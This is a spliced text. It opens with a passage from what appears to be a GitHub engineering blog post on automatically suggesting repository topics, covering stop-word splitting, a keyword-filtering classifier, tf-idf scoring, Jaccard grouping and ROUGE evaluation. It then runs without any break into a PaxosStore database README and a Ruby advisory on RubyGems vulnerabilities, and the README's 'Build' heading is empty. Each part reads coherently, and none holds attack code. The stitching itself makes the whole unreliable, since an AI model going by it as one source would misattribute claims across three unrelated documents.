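    return [s.strip() for s in re.split(r"[.!?;:\n]+|#{1,6}", text) if s.strip()]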

Finding candidate topics

We use the cleaned text from the previous step to generate candidate topics by eliminating low-information words and breaking the remaining text into strings of one or more consecutive words, called n-grams. Like any text, our sources contain many words that are so common that they do not contain distinguishing information. Called stop words, these typically include determiners like “is”, “the”, “are”, conjunctions like “and”, “but”, and “yet”, and so on. Given our specialized domain, we created a custom stop word list that included words that are practically ubiquitous in our source text; for example, “push”, “pull”, “software”, “tool”, “var”, “val”, and “package.” The custom stop word list provides an efficient way of finding potential topics, as we simply take the resulting phrases left between eliminated words. For example, “this open source software is used for web scraping and search” produces three candidate topics: 1. “open source,” 2. “web scraping,” 3. “search”. This process eliminates the need for brute-force n-gram generation, which could end up producing a large number of n-grams depending on the length of the README files being processed. After testing internally among GitHub staff, we found that n-grams made up of many words tended to be too specific (e.g. “machine-learning-tutorial-part-1-intro”), so we limit candidate topics to n-grams of size 4 or less.
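
A small Python sketch of this stop-word splitting approach follows; the stop-word list here is a tiny illustrative subset of the custom list described above.

STOP_WORDS = {"is", "the", "are", "and", "but", "yet", "this", "for", "used",
              "push", "pull", "software", "tool", "var", "val", "package"}
MAX_NGRAM = 4

def candidate_topics(segment):
    """Split a segment at stop words; keep the phrases left in between, up to 4 words long."""
    candidates, phrase = [], []
    for token in segment.lower().split():
        if token in STOP_WORDS:
            if 0 < len(phrase) <= MAX_NGRAM:
                candidates.append(" ".join(phrase))
            phrase = []
        else:
            phrase.append(token)
    if 0 < len(phrase) <= MAX_NGRAM:
        candidates.append(" ".join(phrase))
    return candidates

candidate_topics("this open source software is used for web scraping and search")
# -> ["open source", "web scraping", "search"]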

Selecting best topics

Eliminating low quality topics

While some of the generated word units in the previous step would be meaningful as topics, some could also be plain noise. We have a few strategies for pruning noise and unpromising candidate topics. The first is simply to eliminate phrases with low frequency counts. For example, if we had the following candidates with their corresponding counts, we could eliminate some of the low frequency topics:

machine learning tutorial part 1 (1)
machine learning (5)
beginners data science course (1)
topic modeling (3)

From the above, we could easily eliminate topics that don’t satisfy a minimum frequency count threshold. However, this method doesn’t prune out topics with unwanted grammatical structure or word composition. For example, words and phrases like “great”, “cool”, “running slowly”, “performing operations”, “install database” and “@kavgan” (a GitHub handle) are not great topics for a repository. To aggressively prune out these keywords, we developed a supervised logistic regression model, trained to classify a topic as “good” (positive) or “bad” (negative). We call this the keyword filtering model. We manually gathered about 300 training examples balanced across the positive (good topics) and negative (bad topics) categories. Because of this manual process with no input from users, our training data is actually fairly small. While it’s possible to learn from the actual words that make up a topic when you have a very large training set, with limited training data we used features that draw on the meta-information of the training examples so that our model does not just memorize specific words. For instance, one of the features we used was the part-of-speech usage within topics. If the model learns that single word verbs are often considered bad topics, the next time it sees such an occurrence, it would help eliminate such words from further consideration. Other features we used were occurrence of user names, n-gram size of a phrase, length of a phrase, and numeric content within a phrase. Our classifier is tuned for high recall in order to keep as many phrases as possible and prune obviously incorrect ones.

With time, we plan to include feedback from users to update the keyword filtering model. For example, highly accepted topics can serve as positive training examples and highly rejected topics can either be used as stop words or used as negative examples in our model. We believe that this incremental update would help weed out uninteresting topics from the suggestions list.

Scoring candidate topics

Instead of treating all remaining candidate topics with equal importance, we rank the candidates by score to return only the top-N promising topics instead of a large list of arbitrary topics. We experimented with several scoring schemes. The first scoring approach measures the average strength of association of words in a phrase using pointwise mutual information (PMI) weighted by the frequency count of the phrases. The second approach we tried uses the average tf-idf scores of individual words in a phrase weighted by the phrase frequency (if it’s more than one word long) and n-gram size.

We found that the first scoring strategy favored topics that were unique in nature because of the way PMI works when data is fairly sparse: unique phrases tend to get very high scores. While some highly unique phrases can be interesting, some unique phrases can just be typos or even code snippets that were not formatted as code. The second approach favored phrases that were less unique and relatively frequent. We ended up using the tf-idf based scoring as it gave us a good balance between uniqueness of a topic and relevance of a topic to a repository. While our tf (term frequency) scoring is based on local counts, our idf (inverse document frequency) weighting is based on a large dictionary of idf scores built using the unstructured content from millions of public READMEs. The idf weights essentially tell us how common or unique a term is globally. The intuition is that the more common a term, the less information it carries and should thus have a lower weight. For example, in the GitHub domain, the term “application” is much more common than terms such as “machine”, “learning”, or “assignment” and this is clearly reflected by their idf weights as shown below:

word          idf
application   4.300
machine       7.169
learning      7.818
assignment    8.480

If a phrase has many words with low idf weighting, then its overall score should be lower compared to a phrase with more significant words - this is the intuition behind our tf-idf scoring strategy. As an example, assuming that the normalized tf of each word above is 0.5, the average tf-idf score for “machine-learning-application” would be 3.21 and the average tf-idf score for “machine-learning-assignment” would be 3.91. The former has a lower score because the term “application” is more ubiquitous and has a lower idf score than the term “assignment”.
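
This arithmetic can be checked directly with a few lines of Python, using the idf values from the table above and the assumed normalized tf of 0.5:

idf = {"application": 4.300, "machine": 7.169, "learning": 7.818, "assignment": 8.480}

def avg_tfidf(phrase, tf=0.5):
    """Average tf-idf of the words in a hyphenated phrase, with a fixed normalized tf."""
    words = phrase.split("-")
    return sum(tf * idf[w] for w in words) / len(words)

round(avg_tfidf("machine-learning-application"), 2)  # 3.21
round(avg_tfidf("machine-learning-assignment"), 2)   # 3.91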

In addition to the base tf-idf scoring, we are also experimenting with some additional ideas such as boosting scores of those phrases that tend to occur earlier in a document and aren’t unique to a few repositories. These minor tweaks are subject to change based on our internal evaluation.

Discovering similar topics

Canonicalizing topics to address character level topic differences and inflections

Because different users can express similar phrases in different ways, the generated topics can also vary from repository to repository. For example, we have commonly seen these variations of topics across different repositories:

neural-network
neural-networks
neuralnetwork
neuralnetworks
topic-models
topic-modelling
topic-modeling
topicmodel
topicmodeling
machinelearning-algorithms
machine-learning-algorithm

To keep topic suggestions fairly consistent, we use a dictionary to canonicalize suggested topics. Instead of suggesting the original topics discovered, we suggest a canonicalized version of the topic if present in our dictionary. This in-house dictionary was built using all non-canonicalized topics across public repositories. The non-canonicalized topics give us cues as to which topics are most commonly used and which ones can be grouped together as being equivalent. We currently use a combination of edit-distance, stemming, and word-level Jaccard similarity to group similar topics together. Jaccard similarity in our case estimates how similar two phrases are by comparing members of two sets to see which members are shared and which are distinct. With this, phrases that share many words can be grouped together.
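
A hedged sketch of this kind of grouping is shown below; the crude normalization and the 0.5 threshold are illustrative assumptions rather than the production settings, and the real system additionally uses edit distance to catch variants that share no whole words (e.g. “topicmodeling” vs. “topic-modeling”).

def normalize(topic):
    """Crude normalization: split on hyphens and strip a trailing 's' as a stand-in for stemming."""
    return {w.rstrip("s") for w in topic.replace("-", " ").split()}

def jaccard(a, b):
    """Set-based Jaccard similarity: shared members over all members."""
    return len(a & b) / len(a | b)

def same_group(t1, t2, threshold=0.5):
    """Group two topic variants if their normalized word sets are similar enough."""
    return jaccard(normalize(t1), normalize(t2)) >= threshold

same_group("neural-networks", "neural-network")                 # True
same_group("machine-learning-algorithm", "linear-regression")   # False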

Near similar topics

While it’s possible to suggest all top-scoring topics, some topics may be fairly repetitive, and the set of topics returned may not provide enough variety for labeling a repository. For example, the following top-scoring topics (from an actual repository), while valid and meaningful, are not interesting and lack variety, as they capture different granularities of similar topics:

machine learning
deep learning
general-purpose machine learning
machine learning library
machine learning algorithms
distributed machine learning
machine learning framework
deep learning library
support vector machine
linear regression

We use a greedy topic selection strategy that starts with the highest-scoring topic. If the topic is similar to other lower-scoring topics, the lower-scoring topics are dropped from consideration. We repeat this process iteratively using the next highest-scoring topic until all candidate topics have been accounted for. For the example above, the final set of topics returned to the user would be as follows:

machine learning
deep learning
support vector machine
linear regression

We use word-level Jaccard similarity when computing similarity between phrases, because it’s known to work well for short phrases. It also produces a score between 0 and 1, making it easy to set thresholds.
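
A minimal Python sketch of this greedy selection follows. The 0.5 similarity threshold is an assumed value, chosen so that the toy run reproduces the example above.

def jaccard(a, b):
    """Word-level Jaccard similarity between two phrases."""
    a, b = set(a.split()), set(b.split())
    return len(a & b) / len(a | b)

def select_diverse(ranked_topics, threshold=0.5):
    """Greedily keep the highest-scoring topic; drop lower-scoring near-duplicates."""
    selected = []
    for topic in ranked_topics:              # assumed sorted best-first by score
        if all(jaccard(topic, kept) < threshold for kept in selected):
            selected.append(topic)
    return selected

ranked = ["machine learning", "deep learning", "general-purpose machine learning",
          "machine learning library", "machine learning algorithms",
          "distributed machine learning", "machine learning framework",
          "deep learning library", "support vector machine", "linear regression"]
select_diverse(ranked)
# -> ['machine learning', 'deep learning', 'support vector machine', 'linear regression']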

Evaluation

As topic labels were not available during the development of repo-topix, we needed to get a rough approximation of how well the suggested topics describe a repository. For this rough approximation, we used the description text for repositories since descriptions often provide insights into the function of a repository. If indeed the auto-suggested topics are not completely arbitrary, there should be some amount of overlap between suggested topics and the description field. For this evaluation, we computed ROUGE-1 precision and recall. ROUGE is an n-gram overlap metric that counts the number of overlapping units between a system summary (suggested topics in our case) and a gold standard summary (description in our case). We performed this evaluation on roughly 127,000 public repositories with fairly long descriptions. These are our most recent results:

Repos with no topic suggestions: ~28%
Average ROUGE-1 Recall: 0.259
Average ROUGE-1 Precision: 0.372
F-Measure: 0.306

The ROUGE recall above tells us quantitatively how much of the description is being captured by topic suggestions and precision tells us what proportion of the suggestion words are words that are also in the description. Based on the results we see that there is some overlap as expected. We’re not looking for perfect overlap, but some level of overlap after disregarding all stop words.
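
For illustration, a simplified, set-based version of the ROUGE-1 computation used here might look like the following; real ROUGE counts overlapping unigram occurrences rather than unique words, and the stop-word list is a placeholder.

STOP_WORDS = {"a", "an", "the", "for", "and", "of", "to"}

def rouge1(suggested_topics, description):
    """Unigram overlap between suggested topics (system) and the repo description (reference)."""
    system = {w for t in suggested_topics for w in t.lower().split() if w not in STOP_WORDS}
    reference = {w for w in description.lower().split() if w not in STOP_WORDS}
    overlap = system & reference
    precision = len(overlap) / len(system) if system else 0.0
    recall = len(overlap) / len(reference) if reference else 0.0
    return precision, recall

rouge1(["machine learning", "topic modeling"],
       "a library for machine learning and topic modeling")
# -> (1.0, 0.8)  # every suggested word appears in the description; "library" is missed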

Our topics extraction framework is capable of discovering promising topics for any public repository on GitHub.com. Instead of applying heavy NLP and complex parsing algorithms within our framework (e.g. grammar-based markdown parsing, dependency parsing, chunking, lemmatization), we focused on using lightweight methods that would easily scale as GitHub.com’s repository base grows over the years. For many of our tasks, we leverage the volume of available data to build out reusable dictionaries, such as the IDF dictionary (built using all public README files), a custom stop-word list, and a canonicalization dictionary for topics. While we currently depend on the presence of README files to generate suggestions, in the future we hope to make suggestions by looking at any available content within a repository. Most of the core topics extraction code was developed using Java and Python within the Spark framework.

Our plan for the near future is to evaluate the usage of suggested topics as well as manually created topics to continuously improve suggestions shown to users. Some of the rejected topics could feed into our topics extraction framework as stop words or as negative examples to our keyword filtering model. Highly accepted topics could add positive examples to our keyword filtering model and also provide lessons on the type of topics that users care about. This would provide cues as to what type of “meta-information” users add to their repositories in addition to the descriptive terms found within README files. We also plan to explore topic suggestions on private repositories and with GitHub Enterprise in a way that fully respects privacy concerns and eliminates certain data dependencies.

Beyond these near term goals, our vision for using topics is to build an ever-evolving GitHub knowledge graph containing concepts and mapping how they relate to each other and to the code, people, and projects on GitHub.

These are references to some of the libraries that we used:

Want to work on interesting problems like code analysis, social network analysis, recommendation engines, and improving search relevance? Apply here!

  • Kavita Ganesan, @kavgan, Senior Data Scientist - Machine Learning
  • Rafer Hazen, @rafer, Engineering Manager - Data Engineering
  • Frances Zlotnick, @franniez, Senior Data Scientist - Analytics

PaxosStore: A Distributed-Database Inspired by Google MegaStore


PaxosStore is a distributed database initially inspired by Google MegaStore. It's the second generation of storage system developed to support current WeChat services and applications. PaxosStore has been deployed in WeChat production for more than two years, providing storage services for the core businesses of the WeChat backend, including user account management, user relationship management (i.e., contacts), instant messaging, social networking (i.e., Moments), and online payment (i.e., WeChat Pay).

Now PaxosStore is running on thousands of machines, and is able to sustain billions of peak TPS.

Prior to PaxosStore, we had been using a QuorumKV storage system to support various WeChat services with strongly consistent read/write since 2011. As the number of storage servers rose to tens of thousands, the operational maintenance and development of an NWR-based system at such a large scale became painful. That's why we came up with PaxosStore: a new generation of distributed database, built on top of a leaseless Paxos consensus layer, providing

  • Two Paxos consensus libraries (the key algorithms described in our paper published at VLDB 2017 are now open source):

    • Certain for the general PaxosLog + DB design;
    • PaxosKV optimized for key-value storage (PaxosLog-as-value);

    In addition, the following items are planned for open source by October 2017.

  • A high performance key-value system

  • A system that supports rich data structures such as queues, lists, sets, and collections

  • A high performance storage engine backed by LSM-tree

  • A new SQL-like table system

The PaxosStore Architecture

image

Please refer to the following publications for the technical details of PaxosStore.

Build

License

PaxosStore is under the BSD 3-Clause License. See the LICENSE.txt file for details.

Multiple vulnerabilities in RubyGems

There are multiple vulnerabilities in the RubyGems bundled with Ruby, as reported on the official RubyGems blog.

Details

The following vulnerabilities have been reported.

  • a DNS request hijacking vulnerability
  • an ANSI escape sequence vulnerability
  • a DoS vulnerability in the query command
  • a vulnerability in the gem installer that allowed a malicious gem to overwrite arbitrary files

It is strongly recommended that Ruby users apply one of the following workarounds as soon as possible.

Affected Versions

  • Ruby 2.2 series: 2.2.7 and earlier
  • Ruby 2.3 series: 2.3.4 and earlier
  • Ruby 2.4 series: 2.4.1 and earlier
  • prior to trunk revision 59672

Workarounds

At the moment, there are no Ruby releases that include the fix for RubyGems, but you can upgrade RubyGems to the latest version. RubyGems 2.6.13 or later includes the fix for these vulnerabilities.

gem update --system

If you can’t upgrade RubyGems, you can apply the following patches as a workaround.

For the trunk, update to the latest revision.

Credits

This report is based on the official blog of RubyGems.

History

  • Originally published at 2017-08-29 12:00:00 UTC